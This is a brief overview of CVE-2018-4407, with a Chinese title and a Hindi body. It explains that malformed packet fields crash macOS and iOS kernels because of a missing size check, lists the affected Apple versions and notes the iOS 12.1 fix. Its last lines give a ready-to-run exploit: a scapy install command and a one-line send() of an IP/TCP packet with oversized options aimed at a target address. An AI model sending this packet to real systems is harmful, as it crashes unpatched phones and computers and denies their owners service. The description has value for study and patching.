
CVE-2018-4407 概述與實現
सिद्धांत यह है कि "icmp" पैकेट के अन्य फ़ील्ड्स को अवैध बना दिया जाता है, जिससे macOS या iPhone कर्नेल द्वारा पार्स करते समय आकार की जाँच न होने के कारण क्रैश हो जाता है।
Apple iOS 11 और पुराने संस्करण: सभी उपकरण
Apple macOS High Sierra (प्रभावित उच्चतम संस्करण 10.13.6): सभी उपकरण
Apple macOS Sierra (प्रभावित उच्चतम संस्करण 10.12.6): सभी उपकरण
Apple OS X El Capitan और पुराने संस्करण: सभी उपकरण
Apple ने 30 अक्टूबर को जारी "iOS 12.1" अपडेट पैकेज में इस भेद्यता को पूरी तरह से ठीक कर दिया।
pip install scapy
sudo scapy send(IP(dst="Target IP",options=[IPOption("A"*8)])/TCP(dport=2323,options=[(19, "1"*18),(19, "2"*18)]))